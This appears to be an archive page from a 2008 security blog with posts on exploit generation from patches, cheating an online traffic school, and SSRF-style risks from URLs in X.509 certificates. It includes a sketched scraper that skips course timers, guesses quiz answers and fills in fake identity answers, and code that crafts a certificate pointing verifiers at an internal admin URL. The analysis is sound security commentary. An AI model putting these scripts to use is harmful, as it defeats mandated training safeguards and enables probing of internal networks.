SYSSEC: April 2008 Archives

 

April 21, 2008

In any cost/benefit analysis of vulnerability policy, we have to factor in the impact of exploitation that results from the fix itself. In particular, if you publish a full description of the vulnerability at the same time as you patch it, it's generally easy for an attacker to construct an exploit. Since patch distribution and installation can take anywhere from hours to weeks, this gives attackers a significant window of opportunity to mount attacks before people have patched their machines.

A natural response to this is to simply release patches but not descriptions of vulnerabilities, on the theory that the patches disclose less. This obviously isn't true for open source systems, since it's trivial to examine a given change and determine what attack it's designed to stop, but there have also been reports of attackers reverse engineering binary patches (in some cases within hours) to construct exploits. At this year's IEEE Security and Privacy (Oakland), Brumley et al. take this to its logical conclusion and describe a technique for automatically generating exploits from patches. As far as I can tell, this doesn't really change the situation much: it was widely believed this was possible, and while this tool takes seconds to minutes instead of hours, it was never plausible that you'd get complete patch deployment inside of 12-24 hours anyway, so shaving a few hours off the attacker's time may not make much of a difference.
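To see why a patch leaks so much, consider a toy source-level example. This is just a sketch of the intuition behind patch diffing; everything below (the function, the bug) is invented for illustration, and the real Brumley et al. work operates on binaries with far heavier machinery:

    import difflib

    # Toy "unpatched" and "patched" versions of the same parsing routine.
    unpatched = """\
    def parse_record(buf):
        length = buf[0]
        return buf[1:1 + length]
    """

    patched = """\
    def parse_record(buf):
        length = buf[0]
        if length > len(buf) - 1:
            raise ValueError("bad length")
        return buf[1:1 + length]
    """

    # The diff immediately exposes the new sanity check, and with it the
    # condition an exploit input must trigger: length > len(buf) - 1.
    for line in difflib.unified_diff(unpatched.splitlines(),
                                     patched.splitlines(),
                                     fromfile="unpatched", tofile="patched",
                                     lineterm=""):
        print(line)

The same game works on binary patches, just with disassembly and a constraint solver instead of difflib.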

The authors describe a number of techniques (obfuscation, encrypted patches, P2P patch distribution) one might imagine using to reduce the impact of fast attack generation, and conclude (correctly IMO) they're not that likely to work. As I understand it, the critical path item in patch installation for important systems isn't obtaining the patch but testing it on sacrificial systems to make sure it doesn't introduce instability, and that creates an inherent lag that probably can't be removed with a new distribution method.

Another alternative (though it goes against the trend in recent practice) is to be less aggressive about releasing patches for vulnerabilities that haven't already been disclosed. The faster attackers can weaponize a patch relative to how fast defenders can deploy it, the more a fix released in an orderly fashion looks like a zero-day disclosure, and so the less attractive it becomes to fix vulns that aren't generally known (Res04 has some analysis of this issue).

 

April 6, 2008

On the security of traffic school

After a recent ticket (received while on a conference call, believe it or not), I opted for traffic school. In Santa Clara County, if you want Web traffic school, you need to take it from DriversEd.com. Luckily, as of 2008 you no longer need to go in and take a final exam in person; you can do the whole thing online, which makes the process comparatively painless.

Unsurprisingly, DriversEd.com has some features designed to ensure you receive the full educational value of the traffic school experience:

  • Timers that require you to stay on a page for a specified amount of time.
  • Intermediate tests.
  • Security questions (e.g., what are the last four digits of your SSN?).

Of course, as a security guy the first thing I think about is how to bypass this stuff. The timers are easy: they're in JavaScript. If you run your browser without JavaScript, they go away, so you can in principle zip through the pages as fast as you want. I didn't see any evidence this was enforced on the server side.
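Just for the record, server-side enforcement wouldn't be hard, which makes its apparent absence surprising. Here's a minimal sketch of what it might look like; the names and the two-minute figure are invented:

    import time

    # Record when each page was served and refuse to hand out the next one
    # until the required reading time has elapsed. Client-side tricks like
    # disabling JavaScript can't get around a check the server does itself.
    MIN_SECONDS_PER_PAGE = 120  # invented requirement
    page_served_at = {}  # (session_id, page_number) -> timestamp

    def serve_page(session_id, page_number):
        page_served_at[(session_id, page_number)] = time.monotonic()
        return f"<html>...instructional page {page_number}...</html>"

    def next_page(session_id, current_page):
        started = page_served_at.get((session_id, current_page))
        if started is None or time.monotonic() - started < MIN_SECONDS_PER_PAGE:
            raise PermissionError("not so fast")
        return serve_page(session_id, current_page + 1)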

Of course, then you're not paying attention, so you may have some trouble with the intermediate tests. Luckily, if you get an answer wrong, they give you the right answer and then present a slightly different selection of questions, with a lot of overlap with the previous ones. I wasn't brave enough to try this, since there might be some limit on the number of attempts, but it looks like you could just fail your way to having all the answers. And, of course, you could Google the answers. So, clearly, one could just zip through all the pages and then flail through the self-tests.

The security questions are obviously designed to stop you from outsourcing the task of taking the class to someone else, since you'd need to give them some personal information. Most of it (weight, DL#, height, DOB, zip code) isn't really private, but you might not want to give your contract click monkey your SSN. Weirdly, the registration program prompts you for this stuff even though a lot of it is on your license. I wonder if you could just type in fake answers, in which case you could safely have someone else do the course for you.

If you were willing to do some programming work, you could probably just screen scrape the pages: clicking through the instructional pages, picking out the self-tests and answering them by random guessing plus corrections (nicely highlighted in red and green), and then answering the security questions (a sketch follows). With some luck, I suspect I could do this in about 20% more time than it would take to just go through the class the old-fashioned way. That's what a real programmer would do.
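Here's roughly what that scraper might look like. To be clear, I haven't written or run this against the real site: the endpoints, form fields, and markup are all invented, so treat it as a sketch of the control flow rather than a working cheat:

    import random
    import re
    import requests  # third-party HTTP library

    BASE = "https://trafficschool.example"  # hypothetical stand-in
    session = requests.Session()

    # Canned answers for the identity questions (see above).
    SECURITY_ANSWERS = {"ssn_last4": "1234", "zip": "95050", "dob": "01/01/1970"}

    def answer_quiz(page_html):
        """Guess randomly, then resubmit using the corrections the site
        helpfully displays (markup here is invented)."""
        questions = re.findall(r'name="(q\d+)"', page_html)
        guesses = {q: random.choice("abcd") for q in questions}
        result = session.post(f"{BASE}/quiz", data=guesses).text
        corrections = dict(re.findall(r'correct-(q\d+)">([a-d])<', result))
        guesses.update(corrections)
        return session.post(f"{BASE}/quiz", data=guesses).text

    page = session.get(f"{BASE}/course/1").text
    while "Congratulations" not in page:
        if "security question" in page:
            page = session.post(f"{BASE}/verify", data=SECURITY_ANSWERS).text
        elif 'name="q1"' in page:
            page = answer_quiz(page)
        else:
            # Instructional page: no JavaScript runs here, so no timer.
            next_url = re.search(r'href="(/course/\d+)"', page).group(1)
            page = session.get(f"{BASE}{next_url}").text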

 

April 3, 2008

Martin Rex points to this whitepaper about a claimed security flaw in RFC 3280 (the RFC for X.509/PKIX certificates). The issue is that certificates can contain a variety of URLs (a sketch of extracting them follows the list), including:
  • Pointers to intermediate certificates (for the signer of this cert).
  • Pointers to the certificate policy statement.
  • Pointers to where you can get a CRL.
  • Pointers to an OCSP server.
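
For concreteness, here's a quick sketch of pulling all four kinds of URL out of a certificate, using the modern pyca/cryptography library (the file name is hypothetical):

    from cryptography import x509
    from cryptography.x509.oid import ExtensionOID, AuthorityInformationAccessOID

    with open("some-cert.pem", "rb") as f:
        cert = x509.load_pem_x509_certificate(f.read())

    def ext(oid):
        try:
            return cert.extensions.get_extension_for_oid(oid).value
        except x509.ExtensionNotFound:
            return None

    # Authority Information Access carries both the intermediate-certificate
    # ("CA Issuers") URL and the OCSP server URL.
    for desc in ext(ExtensionOID.AUTHORITY_INFORMATION_ACCESS) or []:
        if desc.access_method == AuthorityInformationAccessOID.CA_ISSUERS:
            print("intermediate cert:", desc.access_location.value)
        elif desc.access_method == AuthorityInformationAccessOID.OCSP:
            print("OCSP server:", desc.access_location.value)

    # CRL Distribution Points.
    for dp in ext(ExtensionOID.CRL_DISTRIBUTION_POINTS) or []:
        for name in dp.full_name or []:
            print("CRL:", name.value)

    # Certificate policies can carry a CPS URI as a policy qualifier.
    for pol in ext(ExtensionOID.CERTIFICATE_POLICIES) or []:
        for qualifier in pol.policy_qualifiers or []:
            if isinstance(qualifier, str):
                print("policy statement:", qualifier)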

When your client goes to validate the certificate, it may (automatically) try to retrieve what's on the other end of the URL. Arguably, this is bad:

However, elegant does not usually mean secure. The problem in this case is that until the certificate chain is verified, the user sending the certificate is usually untrusted. This means that the specified URI has to be treated as potentially evil input from an unauthenticated user. This simple fact is missing from the "Security Considerations" section of the RFC and thus implementors have gotten it wrong.

When implemented naively, this means that an unauthenticated user can embed arbitrary URIs within a certificate and can thus force the verifier to send out arbitrary HTTP requests on its behalf -- for example to networks formerly unreachable to an attacker. The response itself is not forwarded to the attacker, so he is limited to blind attacks. A specific case of this can be used to gain information about the verifier -- for example whether he has opened a certain email or office document. As more than one URI can be embedded in the certificate, it would also theoretically be possible to gain information on internal networks using timing information. For this, one would create a certificate with one URI controlled by the attacker, one URI internal to the attacked network, one URI controlled by the attacker and measure the timing distance between the two accesses to the attacker-controlled URIs. In practical experience, this is still theoretical, though.

This is certainly technically true, but it's unclear how serious the issue is. After all, if your mail client is willing to read HTML mail (and many are) and automatically retrieves inline images (many do), then it's pretty easy for the sender to verify that you read a given message, and potentially to mount the timing attacks these researchers describe (though it's an open question whether that would work). There are actually a number of protocols that have automatic URL dereference built in.

There's actually something more interesting, though trickier to exploit (and harder to deal with), here. The whitepaper talks about probing internal servers, but depending on what services are running there and on what ports, there's some possibility that the client (presumably behind the firewall) could talk to an internal server and do more than just detect it; theoretically, it might be able to give the server instructions that it would follow. How well this works depends a lot on what the internal service is. The attacker doesn't get much control over the message the client sends; it just gets to embed the URL in an HTTP GET request. Obviously, since the client is speaking HTTP, it would be most convenient if the target were an HTTP server, since then you'd be protocol compliant. In theory, HTTP GETs are not supposed to have side effects on the server, but of course that happens all the time.
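To make that concrete, here's a sketch (pyca/cryptography again) of minting a throwaway certificate whose CRL distribution point is whatever URL the attacker likes; the internal address and path are invented. Anyone can mint one of these, which is exactly the problem: a verifier that fetches CRLs automatically will issue that GET from its side of the firewall:

    from datetime import datetime, timedelta
    from cryptography import x509
    from cryptography.x509.oid import NameOID
    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import ec

    key = ec.generate_private_key(ec.SECP256R1())
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "anyone at all")])

    # Self-signed, so no CA cooperation is needed; the interesting part is
    # the attacker-chosen URL in the CRL Distribution Points extension.
    cert = (
        x509.CertificateBuilder()
        .subject_name(name)
        .issuer_name(name)
        .public_key(key.public_key())
        .serial_number(x509.random_serial_number())
        .not_valid_before(datetime.utcnow())
        .not_valid_after(datetime.utcnow() + timedelta(days=1))
        .add_extension(
            x509.CRLDistributionPoints([x509.DistributionPoint(
                full_name=[x509.UniformResourceIdentifier(
                    "http://10.1.2.3/admin/do-something?confirm=yes")],
                relative_name=None, reasons=None, crl_issuer=None)]),
            critical=False)
        .sign(key, hashes.SHA256())
    )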

If the server isn't HTTP, then you have to get pretty lucky. You need to be able to encode a meaningful protocol request in the URI, and the server needs to be tolerant enough of nonconformant traffic that it's willing to ignore the bogus HTTP request wrapper and process whatever request is embedded in the URI. This obviously isn't superconvenient for the attacker, who would like a much finer degree of control over the protocol messages, like you'd get with a client-side program (hence the browser same-origin policy).
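To see just how constrained the attacker is, look at the bytes a naive verifier would actually emit for a URI it pulled out of a certificate (the host, port, and path below are invented):

    from urllib.parse import urlsplit

    uri = "http://10.1.2.3:2525/SOME%20COMMAND"  # hypothetical embedded URI
    u = urlsplit(uri)

    # Roughly what a naive HTTP client puts on the wire. The attacker only
    # controls the request-target; the method, version, and Host framing are
    # fixed, so a non-HTTP server has to skip past all of that and act on
    # whatever fragment it manages to parse.
    request = (f"GET {u.path or '/'}{'?' + u.query if u.query else ''} HTTP/1.1\r\n"
               f"Host: {u.netloc}\r\n"
               "\r\n")
    print(repr(request))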